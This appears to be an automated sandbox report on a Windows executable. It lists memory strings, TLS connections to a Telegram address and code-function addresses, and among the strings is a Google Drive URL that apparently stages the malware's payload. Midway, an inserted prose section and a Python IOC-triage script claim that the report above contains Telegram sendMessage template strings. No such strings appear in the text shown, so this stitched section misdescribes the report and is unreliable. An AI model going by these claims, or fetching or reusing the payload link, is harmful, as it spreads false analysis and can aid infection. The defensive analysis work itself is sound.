Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003377D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/o
Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930879164.00000000049C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=download
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadal
Source: Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadle
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.0000000033637000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.188$
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Fa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: Fa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337B3000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000337A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Fa24c148.exe, 00000004.00000002.2951440746.00000000337AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49772 version: TLS 1.2
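The memory strings and TLS connections listed above reduce to a small set of indicators: a Telegram bot sendMessage template with blank token and chat_id, a reallyfreegeoip.org lookup of the analysis host's public IP, a Google Drive download stage, and a TLS session to 149.154.167.220. The Python script below is an added triage example, not part of the sandbox report or of the sample's own code. It runs over constructed copies of the report's strings and flows, extracts the Drive file id and the looked-up IP, and flags the TLS server that falls inside Telegram's 149.154.160.0/20 allocation. That netblock (taken from public routing data; verify with whois) and the reading of the blank token/chat_id as a format template filled at runtime are assumptions, not facts the report states.

```python
"""Reduce sandbox 'String found in memory' / 'HTTPS traffic detected' evidence
to IOCs. Added example; not code from the report or the analysed sample."""
import re
from ipaddress import ip_address, ip_network
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Assumption: Telegram Messenger's IPv4 allocation as seen in public BGP data.
# Verify with whois before using it in a production rule.
TELEGRAM_NETS = [ip_network("149.154.160.0/20")]

# Google Drive file ids are long, URL-safe base64-like tokens.
DRIVE_ID_RE = re.compile(r"^[A-Za-z0-9_-]{20,}$")

# Constructed sample: copies of the memory strings shown in the report above.
SAMPLE_STRINGS = [
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a",
    "https://reallyfreegeoip.org/xml/155.94.241.188$",
    "https://drive.google.com/uc?export=download&id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6",
    "https://drive.usercontent.google.com/download?id=1BxjUpVo1l3Tc98y3lq5MzBCE4rW1Evm6&export=downloadal",
    "https://duckduckgo.com/ac/?q=",   # browser search template from harvested profile data, not an IOC
    "https://www.office.com/",
]

# Constructed sample: (server_ip, server_port, client_ip, client_port) from the TLS lines above.
SAMPLE_TLS = [
    ("142.250.185.206", 443, "192.168.2.4", 49736),
    ("149.154.167.220", 443, "192.168.2.4", 49772),
]


def classify_string(s: str) -> Optional[dict]:
    """Map one memory string to an IOC category, or None when it is not an indicator."""
    try:
        u = urlparse(s)
    except ValueError:
        return None
    host, path = u.netloc.lower(), u.path
    q = parse_qs(u.query, keep_blank_values=True)

    if host == "api.telegram.org" and "/sendMessage" in path:
        # Layout is /bot<token>/sendMessage?chat_id=<id>&text=<body>. Both values are blank
        # in the dump, which reads as a template filled at runtime (interpretation, not fact).
        token = path.split("/bot", 1)[1].split("/", 1)[0] if "/bot" in path else ""
        return {"category": "telegram_c2", "host": host,
                "bot_token": token or None, "chat_id": q.get("chat_id", [""])[0] or None}

    if host == "reallyfreegeoip.org" and path.startswith("/xml/"):
        # Raw memory strings carry trailing bytes such as '$'; strip before validating the IP.
        tail = path[len("/xml/"):].rstrip("$")
        try:
            ip = str(ip_address(tail))
        except ValueError:
            ip = None
        return {"category": "geoip_lookup", "host": host, "victim_ip": ip}

    if host in ("drive.google.com", "drive.usercontent.google.com"):
        # export=downloadal / downloadle are the same URL with trailing junk; accept the prefix.
        if q.get("export", [""])[0].startswith("download"):
            fid = q.get("id", [""])[0]
            return {"category": "payload_staging", "host": host,
                    "file_id": fid if DRIVE_ID_RE.match(fid) else None}
    return None


def extract_iocs(strings) -> list:
    """Classify every string and de-duplicate on (category, extracted value)."""
    seen, out = set(), []
    for s in strings:
        ioc = classify_string(s)
        if ioc is None:
            continue
        key = (ioc["category"], ioc.get("bot_token") or ioc.get("victim_ip") or ioc.get("file_id"))
        if key not in seen:
            seen.add(key)
            out.append(ioc)
    return out


def flag_tls_endpoints(flows) -> list:
    """Flag TLS servers whose address lies in a Telegram netblock."""
    out = []
    for server, sport, _client, cport in flows:
        addr = ip_address(server)
        if any(addr in net for net in TELEGRAM_NETS):
            out.append({"server": server, "port": sport, "client_port": cport,
                        "why": "telegram_api_range"})
    return out


def triage(strings, flows) -> dict:
    """Combine string and flow evidence into one verdict."""
    iocs = extract_iocs(strings)
    tls = flag_tls_endpoints(flows)
    cats = {i["category"] for i in iocs}
    # Template in memory plus a live TLS session to Telegram's range is the exfil pattern.
    verdict = "telegram_exfil_likely" if "telegram_c2" in cats and tls else "inconclusive"
    return {"iocs": iocs, "tls_flags": tls, "verdict": verdict}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_STRINGS, SAMPLE_TLS).items():
        print(k, v)
```

The Drive file id and the looked-up IP are the two values worth pivoting on: the id identifies the staged payload across other sandbox runs, and the IP is the sandbox's egress address (the malware fetches it to geolocate the victim), so it should not be treated as attacker infrastructure.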
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_00405160 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405160
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 0_2_004031FF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004031FF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess, 4_2_004031FF
Source: C:\Users\user\Desktop\Fa24c148.exe File created: C:\Windows\resources\0809 Jump to behavior
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_004063CC 0_2_004063CC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 0_2_0040499D 0_2_0040499D
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_004063CC 4_2_004063CC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0040499D 4_2_0040499D
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016A088 4_2_0016A088
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C147 4_2_0016C147
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016D278 4_2_0016D278
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00165362 4_2_00165362
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C468 4_2_0016C468
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00166498 4_2_00166498
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016D548 4_2_0016D548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_001676F1 4_2_001676F1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016C738 4_2_0016C738
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016E988 4_2_0016E988
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CA08 4_2_0016CA08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CCD8 4_2_0016CCD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016CFAA 4_2_0016CFAA
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00166FC8 4_2_00166FC8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016E97A 4_2_0016E97A
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_0016F961 4_2_0016F961
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_00163E09 4_2_00163E09
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35782968 4_2_35782968
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35789548 4_2_35789548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578FC68 4_2_3578FC68
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35785028 4_2_35785028
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_357817A0 4_2_357817A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578DE00 4_2_3578DE00
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35781E80 4_2_35781E80
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D550 4_2_3578D550
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D540 4_2_3578D540
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578DDF1 4_2_3578DDF1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D9A8 4_2_3578D9A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D999 4_2_3578D999
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780040 4_2_35780040
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578003F 4_2_3578003F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35789C18 4_2_35789C18
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35785018 4_2_35785018
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578001B 4_2_3578001B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F810 4_2_3578F810
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F803 4_2_3578F803
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578D0F8 4_2_3578D0F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578CCA0 4_2_3578CCA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EF60 4_2_3578EF60
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EF51 4_2_3578EF51
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780B30 4_2_35780B30
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35780B20 4_2_35780B20
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EB08 4_2_3578EB08
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F3B8 4_2_3578F3B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578F3A8 4_2_3578F3A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35788BA0 4_2_35788BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578178F 4_2_3578178F
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35781E70 4_2_35781E70
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E258 4_2_3578E258
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E24B 4_2_3578E24B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578EAF8 4_2_3578EAF8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6B0 4_2_3578E6B0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6AF 4_2_3578E6AF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_3578E6A0 4_2_3578E6A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E681D0 4_2_35E681D0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68FB0 4_2_35E68FB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B78 4_2_35E67B78
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C9E8 4_2_35E6C9E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E615E8 4_2_35E615E8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E615F8 4_2_35E615F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62FF9 4_2_35E62FF9
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E9C8 4_2_35E6E9C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E9D8 4_2_35E6E9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65BD8 4_2_35E65BD8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C9D8 4_2_35E6C9D8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E611A0 4_2_35E611A0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BA0 4_2_35E62BA0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E68FA1 4_2_35E68FA1
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BAF 4_2_35E62BAF
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B7A8 4_2_35E6B7A8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62BB0 4_2_35E62BB0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D787 4_2_35E6D787
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65780 4_2_35E65780
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F788 4_2_35E6F788
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D798 4_2_35E6D798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B798 4_2_35E6B798
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B69 4_2_35E67B69
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67B77 4_2_35E67B77
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65770 4_2_35E65770
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F778 4_2_35E6F778
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E60D48 4_2_35E60D48
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E548 4_2_35E6E548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C548 4_2_35E6C548
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62749 4_2_35E62749
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C558 4_2_35E6C558
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62758 4_2_35E62758
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67720 4_2_35E67720
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E65328 4_2_35E65328
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6A928 4_2_35E6A928
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6A938 4_2_35E6A938
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E538 4_2_35E6E538
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B307 4_2_35E6B307
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E62300 4_2_35E62300
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D308 4_2_35E6D308
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E67710 4_2_35E67710
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6531B 4_2_35E6531B
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6B318 4_2_35E6B318
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F2E7 4_2_35E6F2E7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E608E0 4_2_35E608E0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6D2F7 4_2_35E6D2F7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E608F0 4_2_35E608F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E622F0 4_2_35E622F0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6F2F8 4_2_35E6F2F8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E64EC0 4_2_35E64EC0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C0C8 4_2_35E6C0C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E672C8 4_2_35E672C8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E64ED0 4_2_35E64ED0
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E0A7 4_2_35E6E0A7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E638AC 4_2_35E638AC
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E61EA8 4_2_35E61EA8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6C0B7 4_2_35E6C0B7
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E638B8 4_2_35E638B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E6E0B8 4_2_35E6E0B8
Source: C:\Users\user\Desktop\Fa24c148.exe Code function: 4_2_35E672B8 4_2_35E672B8
